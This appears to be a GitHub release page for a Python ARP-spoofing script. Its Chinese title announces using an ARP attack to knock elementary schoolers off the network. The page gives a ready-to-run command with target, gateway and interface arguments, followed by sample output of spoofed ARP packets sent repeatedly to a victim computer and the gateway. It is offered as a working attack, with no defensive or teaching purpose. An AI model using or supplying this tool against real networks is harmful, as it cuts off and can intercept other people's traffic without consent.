Skip to content

利用ARP攻击断送小学生的网络

Latest
Compare
Choose a tag to compare
@realJustinLee realJustinLee released this 28 Feb 04:54
· 20 commits to master since this release

##大概使用情况如下

python arpspoof.py -t 192.168.1.28 -g 192.168.1.1 -i wlan0

WARNING: No route found for IPv6 destination :: (no default route?)
本机MAC地址是: xxx
目标计算机MAC地址是:xxx
网关MAC地址是: xxx
按任意键继续:
.
Sent 1 packets.
1 []发送一个计算机ARP欺骗包
.
Sent 1 packets.
1 [
]发送一个网关ARP欺骗包
.
Sent 1 packets.
2 []发送一个计算机ARP欺骗包
.
Sent 1 packets.
2 [
]发送一个网关ARP欺骗包
.
Sent 1 packets.
3 []发送一个计算机ARP欺骗包
.
Sent 1 packets.
3 [
]发送一个网关ARP欺骗包
......